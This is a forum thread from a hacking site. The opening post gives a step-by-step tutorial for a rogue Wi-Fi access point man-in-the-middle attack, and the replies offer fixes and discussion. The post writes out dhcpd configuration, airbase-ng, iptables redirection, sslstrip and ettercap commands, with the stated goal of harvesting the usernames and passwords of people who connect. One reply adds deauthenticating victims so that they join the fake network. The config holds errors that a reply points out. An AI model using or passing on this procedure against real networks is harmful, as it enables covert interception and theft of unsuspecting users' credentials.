Pages: [1]

Author Topic: Rogue AP MiTM Attack (Fake AP)  (Read 9909 times)

0 Members and 1 Guest are viewing this topic.

Offline D1M4

  • NULL
  • Posts: 4
  • Cookies: 2
    • View Profile
Rogue AP MiTM Attack (Fake AP)
« on: June 13, 2014, 08:02:29 pm »
Introduction

That's what Wikipedia says: A rogue access point is a wireless acces point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle-attack .

basicaly a Rogue Ap is a fake Ap which you can use to do MiTM attacks. if you don't know what those ar -> http://lmgtfy.com/?q=Man+in+the+middle+attack

This method uses a dhcp server. There are other methods which I will cover in another tutorial.

So let's start.

What do you need?
1. Either a VM running Kali or a PC/Laptop running it
2. 2x Network adapter (or a wired connection)
3. one of them must support both, monitor and master mode

What do you need to do?
  Configure the DHCP Server

1. Open terminal
2. route -n (note Gateway I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the dhcp3 server)
4. nano /etc/dhcpd.conf (configure the dhcp serv)
5.  type or paste the following into your .conf
authorative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called"
option domain-name-servers 192.168.1.1;
ranger 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)

   Start the AP
1. airmon-ng (check Net.Adap. will asume it's wlan0)
2. airmon-ng start wlan0 (start the mon mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL

   Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add routing table)
5. echo 1 </procs/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.0.1 (entering iptables rules)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptabels --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to- port 10000

   Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start

   Starting SSL Strip
1. sslstrip -f -p -k 10000
2. DON'T CLOSE TERMINAL

   Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)

Congrats! If you have't run into any errors you should be able to get all user/pass that are beeing sent over the AP.

-D1M4

Staff note: WHAT THE FUUUUUUUUK too much bbcode :/
« Last Edit: June 13, 2014, 09:08:24 pm by Kulverstukas »
Report to moderator   Logged
The definition of insanity is doing the same thing over and over and expecting different results.
-Albert Einstein

Offline Corrupted_Fear

  • Knight
  • **
  • Posts: 336
  • Cookies: 34
  • Is dangerous to go alone! Take this! @xxxx[{:::::>
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #1 on: June 18, 2014, 04:46:25 am »
Not bad, but you missed a ";" in the dhcp config, behind the domain name ( I think, I'm not 100% sure on that one) and its "range" not "ranger". Could create some syntax errors, and that's just not good.
Report to moderator   Logged

by | Angel | Devil |

"Welcome to le trove that is my home. Welcome to EvilZone." -- DeepCopy

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #2 on: June 18, 2014, 08:36:27 am »
Ya, thanks for sharing.
I would however suggest to use hostapd instead of airbase , airbase just isnt that stable at least from my experience, I used it with a scala of chipsets..
The driver would have to support it but hostapd works like a charm.
« Last Edit: June 18, 2014, 08:36:59 am by proxx »
Report to moderator   Logged
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

The_R

  • Guest
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #3 on: June 20, 2014, 09:07:20 am »
This will be very effective when you send de-authentication signals to probes so they automatically connect with your fake AP. Thanks for this. Really helpful.
Report to moderator   Logged

Offline wofyendor

  • Serf
  • *
  • Posts: 21
  • Cookies: 9
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #4 on: July 22, 2014, 12:43:19 am »
probably silly question:
can this be done with dnsmasq instead of dhcp server ? cause I already have an ap running with dnsmasq

and also
Quote
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)

where did that at0 come from ? is it a wireless, ethernet or monitor interface?

oh, do you have to do a "ifconfig up" before that? <--- Edit
« Last Edit: July 22, 2014, 01:01:02 am by wofyendor »
Report to moderator   Logged

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #5 on: July 22, 2014, 03:23:29 am »
Quote from: wofyendor on July 22, 2014, 12:43:19 am
probably silly question:
can this be done with dnsmasq instead of dhcp server ? cause I already have an ap running with dnsmasq

and also
where did that at0 come from ? is it a wireless, ethernet or monitor interface?

oh, do you have to do a "ifconfig up" before that? <--- Edit
That interface at0 is a Madwifi  device, and he's manually setting that interfaces IP address settings.
Report to moderator   Logged
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline wofyendor

  • Serf
  • *
  • Posts: 21
  • Cookies: 9
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #6 on: July 22, 2014, 06:07:12 am »
Quote
That interface at0 is a Madwifi  device, and he's manually setting that interfaces IP address settings.
I think i get it, it is created by airbase, right? I think that can be the problem, since I used hostapd to set up my ap, gonna check if I can get it to do the same thing.
Report to moderator   Logged

Offline goomball

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #7 on: August 08, 2014, 10:07:02 am »
Hey guys,

did anyone notice, that SSL strip doenst work, as it should?
For example:

If you connect yourself, using your fake AP, to facebook, it simply gives an ssl error.
Same for gmail.com. "Couldnt connect due to an SSL error."

So some https sites are working, but the most interesting are not. 
It seems, that facebook and co are forcing ssl so you are not able to connect without.

Or I'm I wrong?

Cheers guys
Report to moderator   Logged
Pages: [1]